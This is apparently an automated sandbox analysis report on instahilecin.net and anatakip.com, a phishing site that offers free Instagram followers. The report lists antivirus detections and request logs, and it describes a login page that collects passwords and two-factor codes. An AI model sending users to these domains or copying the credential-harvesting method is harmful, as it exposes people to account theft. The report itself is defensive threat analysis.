Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://instahilecin.net/

Overview

General Information

Sample URL:https://instahilecin.net/
Analysis ID:1447764
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
AI detected suspicious javascript
HTML page contains suspicious base64 encoded javascript
Detected non-DNS traffic on DNS port
Form action URLs do not match main URL
Found iframes
HTML body contains low number of good links
HTML page contains hidden URLs or javascript code
Stores files to the Windows start menu directory
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • chrome.exe (PID: 6544 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3788 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 --field-trial-handle=2180,i,14791946737678668430,15849109549246575421,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 1412 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://instahilecin.net/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://instahilecin.net/Avira URL Cloud: detection malicious, Label: phishing
Source: https://anatakip.com/assets/lightgallery/dist/js/lg-video.min.jsAvira URL Cloud: Label: phishing
Source: https://anatakip.com/assets/style/instastyle.css?v=2.4Avira URL Cloud: Label: phishing
Source: https://anatakip.com/assets/scripts/fancybox/source/jquery.fancybox.pack.jsAvira URL Cloud: Label: phishing
Source: https://anatakip.com/favicon.icoAvira URL Cloud: Label: phishing
Source: https://anatakip.com/assets/lightgallery/dist/js/lightgallery.min.jsAvira URL Cloud: Label: phishing
Source: https://anatakip.com/assets/fonts/fontawesome-webfont.woff2?v=4.6.3Avira URL Cloud: Label: phishing
Source: https://anatakip.com/assets/lightgallery/dist/css/lightgallery.min.cssAvira URL Cloud: Label: phishing
Source: https://anatakip.com/assets/logo/favicon.pngAvira URL Cloud: Label: phishing
Source: https://anatakip.com/assets/nprogress/nprogress.jsAvira URL Cloud: Label: phishing
Source: https://anatakip.com/assets/style/font-awesome.min.cssAvira URL Cloud: Label: phishing
Source: https://anatakip.com/assets/style/paper.css?v=v3.1.5Avira URL Cloud: Label: phishing
Source: https://anatakip.com/assets/nprogress/nprogress.cssAvira URL Cloud: Label: phishing
Source: https://anatakip.com/assets/lazyload/jquery.lazyload.min.jsAvira URL Cloud: Label: phishing
Source: https://anatakip.com/assets/jquery/2.2.4/jquery.min.js?v=1Avira URL Cloud: Label: phishing
Source: https://anatakip.com/assets/bootstrap/css/bootstrap-paper.min.cssAvira URL Cloud: Label: phishing
Source: https://anatakip.com/ajax/keep-sessionAvira URL Cloud: Label: phishing
Source: https://anatakip.com/assets/bootstrap/js/bootstrap.min.jsAvira URL Cloud: Label: phishing
Source: https://anatakip.com/assets/logo/logo.pngAvira URL Cloud: Label: phishing
Source: https://anatakip.com/assets/scripts/fancybox/source/jquery.fancybox.css?v=2.1.5Avira URL Cloud: Label: phishing
Source: https://anatakip.com/assets/core/core.js?v=3.1.10Avira URL Cloud: Label: phishing
Source: instahilecin.netVirustotal: Detection: 17%Perma Link
Source: anatakip.comVirustotal: Detection: 10%Perma Link
Source: https://instahilecin.net/Virustotal: Detection: 17%Perma Link

Phishing

barindex
Source: https://anatakip.com/LLM: Score: 8 brands: Instagram Reasons: The URL 'anatakip.com' does not match the legitimate domain name associated with Instagram, which is 'instagram.com'. The site uses social engineering techniques by offering free followers and likes, which is a common tactic in phishing attacks. Additionally, the presence of a login form on a suspicious domain increases the risk of phishing. DOM: 0.0.pages.csv
Source: https://anatakip.com/loginLLM: Score: 8 Reasons: The JavaScript code captures sensitive information such as username, password, and user ID, and sends it via an AJAX POST request to an unspecified URL ('?'). This behavior is typical of phishing attempts where credentials are harvested. Additionally, the code includes functionality for handling two-factor authentication codes, which further suggests it is designed to capture comprehensive user authentication details. DOM: 1.3.pages.csv
Source: https://anatakip.com/loginHTTP Parser: Base64 decoded: <script>
Source: https://anatakip.com/loginHTTP Parser: Form action: //translate.googleapis.com/translate_voting?client=te anatakip googleapis
Source: https://anatakip.com/loginHTTP Parser: Form action: //translate.googleapis.com/translate_voting?client=te anatakip googleapis
Source: https://anatakip.com/loginHTTP Parser: Iframe src: data:text/html;charset=UTF-8;base64,PCFET0NUWVBFIGh0bWw+PGJvZHk+PHNjcmlwdD4oZnVuY3Rpb24oKXsndXNlIHN0cmljdCc7LyoKCiBDb3B5cmlnaHQgVGhlIENsb3N1cmUgTGlicmFyeSBBdXRob3JzLgogU1BEWC1MaWNlbnNlLUlkZW50aWZpZXI6IEFwYWNoZS0yLjAKKi8KdmFyIGU9dGhpc3x8c2VsZjtmdW5jdGlvbiBmKGEpe3JldHVybiBhfTt2YXIgaDtmdW5jdGlvbiBrKGEpe3RoaXMuZz1hfWsucHJvdG90eXBlLnRvU3RyaW5nPWZ1bmN0aW9uKCl7cmV0dXJuIHRoaXMuZysiIn07dmFyIGw9e307ZnVuY3Rpb24gbShhKXtpZih2b2lkIDA9PT1oKXt2YXIgYz1udWxsO3ZhciBiPWUudHJ1c3RlZFR5cGVzO2lmKGImJmIuY3JlYXRlUG9saWN5KXt0cnl7Yz1iLmNyZWF0ZVBvbGljeSgiZ29vZyNodG1sIix7Y3JlYXRlSFRNTDpmLGNyZWF0ZVNjcmlwdDpmLGNyZWF0ZVNjcmlwdFVSTDpmfSl9Y2F0Y2goZCl7ZS5jb25zb2xlJiZlLmNvbnNvbGUuZXJyb3IoZC5tZXNzYWdlKX1oPWN9ZWxzZSBoPWN9YT0oYz1oKT9jLmNyZWF0ZVNjcmlwdFVSTChhKTphO3JldHVybiBuZXcgayhhLGwpfTsvKgoKIFNQRFgtTGljZW5zZS1JZGVudGlmaWVyOiBBcGFjaGUtMi4wCiovCmlmKCFmdW5jdGlvbigpe2lmKHNlbGYub3JpZ2luKXJldHVybiJudWxsIj09PXNlbGYub3JpZ2luO2lmKCIiIT09bG9jYXRpb24uaG9zdClyZXR1cm4hMTt0cnl7cmV0dXJuIHdpbmRvdy5wYXJlbnQuZXNjYXBlKCIiKSwhMX1jYXRjaChhKXtyZXR1cm4hMH19KCkpdGhyb3cgRXJyb3IoInNhbmRib3hpbmcgZXJyb3IiKTsKd2luZG93LmFkZEV2ZW50TGlzdGVuZXIoIm1lc3NhZ2UiLGZ1bmN0aW9uKGEpe3ZhciBjPWEucG9ydHNbMF07YT1hLmRhdGE7dmFyIGI9YS5jYWxsYmFja05hbWUuc3BsaXQoIi4iKSxkPXdpbmRvdzsid2luZG93Ij09PWJbMF0mJmIuc2hpZnQoKTtmb3IodmFyIGc9MDtnPGIubGVuZ3RoLTE7ZysrKWRbYltnXV09e30sZD1kW2JbZ11dO2RbYltiLmxlbmd0aC0xXV09ZnVuY3Rpb24obil7Yy5wb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShuKSl9O2I9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YT1tKGEudXJsKTtiLnNyYz1hIGluc3RhbmNlb2YgayYmYS5jb25zdHJ1Y3Rvcj09PWs/YS5nOiJ0eXBlX2Vycm9yOlRydXN0ZWRSZXNvdXJjZVVybCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChiKX0sITApO30pLmNhbGwodGhpcyk7Cjwvc2NyaXB0PjwvYm9keT4=
Source: https://anatakip.com/loginHTTP Parser: Number of links: 0
Source: https://anatakip.com/loginHTTP Parser: Base64 decoded: <!DOCTYPE html><body><script>(function(){'use strict';/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0*/var e=this||self;function f(a){return a};var h;function k(a){this.g=a}k.prototype.toString=function(){return this.g+"...
Source: https://anatakip.com/loginHTTP Parser: <input type="password" .../> found
Source: https://anatakip.com/loginHTTP Parser: No favicon
Source: https://anatakip.com/loginHTTP Parser: No favicon
Source: about:srcdocHTTP Parser: No favicon
Source: https://anatakip.com/loginHTTP Parser: No <meta name="author".. found
Source: https://anatakip.com/loginHTTP Parser: No <meta name="author".. found
Source: https://anatakip.com/loginHTTP Parser: No <meta name="copyright".. found
Source: https://anatakip.com/loginHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49771 version: TLS 1.0
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: global trafficTCP traffic: 192.168.2.5:49857 -> 1.1.1.1:53
Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49771 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: instahilecin.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: instahilecin.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: anatakip.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/bootstrap/css/bootstrap-paper.min.css HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
Source: global trafficHTTP traffic detected: GET /assets/lightgallery/dist/css/lightgallery.min.css HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
Source: global trafficHTTP traffic detected: GET /assets/scripts/fancybox/source/jquery.fancybox.css?v=2.1.5 HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
Source: global trafficHTTP traffic detected: GET /assets/style/font-awesome.min.css HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
Source: global trafficHTTP traffic detected: GET /assets/style/paper.css?v=v3.1.5 HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
Source: global trafficHTTP traffic detected: GET /assets/nprogress/nprogress.css HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
Source: global trafficHTTP traffic detected: GET /assets/logo/logo.png HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
Source: global trafficHTTP traffic detected: GET /assets/jquery/2.2.4/jquery.min.js?v=1 HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
Source: global trafficHTTP traffic detected: GET /assets/bootstrap/js/bootstrap.min.js HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
Source: global trafficHTTP traffic detected: GET /assets/scripts/fancybox/source/jquery.fancybox.pack.js HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /assets/lightgallery/dist/js/lightgallery.min.js HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
Source: global trafficHTTP traffic detected: GET /assets/lightgallery/dist/js/lg-video.min.js HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
Source: global trafficHTTP traffic detected: GET /assets/lazyload/jquery.lazyload.min.js HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
Source: global trafficHTTP traffic detected: GET /assets/nprogress/nprogress.js HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
Source: global trafficHTTP traffic detected: GET /widget/instamark.png HTTP/1.1Host: whos.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/fonts/fontawesome-webfont.woff2?v=4.6.3 HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://anatakip.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://anatakip.com/assets/style/font-awesome.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
Source: global trafficHTTP traffic detected: GET /assets/core/core.js?v=3.1.10 HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
Source: global trafficHTTP traffic detected: GET /widget/anatakipx.png HTTP/1.1Host: whos.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/logo/logo.png HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
